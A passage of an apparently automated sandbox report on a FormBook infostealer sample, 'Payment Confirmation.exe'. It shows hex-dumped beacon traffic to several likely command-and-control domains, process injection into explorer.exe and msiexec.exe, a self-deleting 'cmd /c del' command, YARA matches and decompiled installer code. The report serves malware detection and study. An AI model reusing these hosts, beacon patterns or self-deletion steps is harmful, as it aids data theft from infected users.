66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61
                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be a
                                                Oct 13, 2021 16:32:26.878061056 CEST4900INData Raw: 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c
                                                Data Ascii: dvised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.6498033.223.115.18580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:32.133338928 CEST4962OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1
                                                Host: www.altitudebc.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:32.270781994 CEST4987INHTTP/1.1 302 Found
                                                Cache-Control: private
                                                Content-Type: text/html; charset=utf-8
                                                Location: https://www.hugedomains.com/domain_profile.cfm?d=altitudebc&e=com
                                                Server: Microsoft-IIS/8.5
                                                X-Powered-By: ASP.NET
                                                Date: Wed, 13 Oct 2021 14:31:35 GMT
                                                Connection: close
                                                Content-Length: 186
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 61 6c 74 69 74 75 64 65 62 63 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=altitudebc&amp;e=com">here</a>.</h2></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.64980482.98.134.15480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:37.462970972 CEST5528OUTGET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.unasolucioendesa.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:37.501957893 CEST5529INHTTP/1.1 301 Moved Permanently
                                                Date: Wed, 13 Oct 2021 14:32:37 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 0
                                                Connection: close
                                                Location: https://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz
                                                Server: HTTPd


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.64980934.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:42.570636034 CEST5539OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1
                                                Host: www.elliotpioneer.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:42.685873032 CEST5540INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 14:32:42 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f93b1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.649810172.105.103.20780C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:48.382261992 CEST5541OUTGET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.thesewhitevvalls.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.64982252.206.159.8080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:54.093128920 CEST5578OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1
                                                Host: www.lumberjackguitarloops.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:54.231038094 CEST5581INHTTP/1.1 301 Moved Permanently
                                                Content-length: 0
                                                Location: https://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.64984034.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:33:00.285758972 CEST5620OUTGET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.carts-amazon.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:33:00.400927067 CEST5620INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 14:33:00 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f93b1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.64984145.91.80.18280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:33:05.709494114 CEST5621OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1
                                                Host: www.chinaopedia.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:33:06.303915977 CEST5622INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Wed, 13 Oct 2021 14:33:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Set-Cookie: security_session_verify=e3f107f1b9aaa89fb44b8d647caca7b2; expires=Sat, 16-Oct-21 22:33:05 GMT; path=/; HttpOnly
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                9192.168.2.64984262.210.5.8180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:33:11.330621958 CEST5623OUTGET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.atp-cayenne.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: Payment Confirmation.exe PID: 2244 Parent PID: 2408

                                                General

                                                Start time:16:31:11
                                                Start date:13/10/2021
                                                Path:C:\Users\user\Desktop\Payment Confirmation.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\Payment Confirmation.exe'
                                                Imagebase:0x400000
                                                File size:455901 bytes
                                                MD5 hash:98FFC3C812E6CEC919EBD286973E2002
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: Payment Confirmation.exe PID: 5440 Parent PID: 2244

                                                General

                                                Start time:16:31:13
                                                Start date:13/10/2021
                                                Path:C:\Users\user\Desktop\Payment Confirmation.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\Payment Confirmation.exe'
                                                Imagebase:0x400000
                                                File size:455901 bytes
                                                MD5 hash:98FFC3C812E6CEC919EBD286973E2002
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: explorer.exe PID: 3440 Parent PID: 5440

                                                General

                                                Start time:16:31:17
                                                Start date:13/10/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6f22f0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: msiexec.exe PID: 1516 Parent PID: 3440

                                                General

                                                Start time:16:31:43
                                                Start date:13/10/2021
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                Imagebase:0x9b0000
                                                File size:59904 bytes
                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 4852 Parent PID: 1516

                                                General

                                                Start time:16:31:49
                                                Start date:13/10/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
                                                Imagebase:0x2a0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: conhost.exe PID: 3800 Parent PID: 4852

                                                General

                                                Start time:16:31:49
                                                Start date:13/10/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff61de10000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                Reset < >

                                                  Analysis Process: Payment Confirmation.exe PID: 2244 Parent PID: 2408 Payment Confirmation.exeCOMMON

                                                  Executed Functions

                                                  Function 004030FB, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x423fec; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x423f5c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
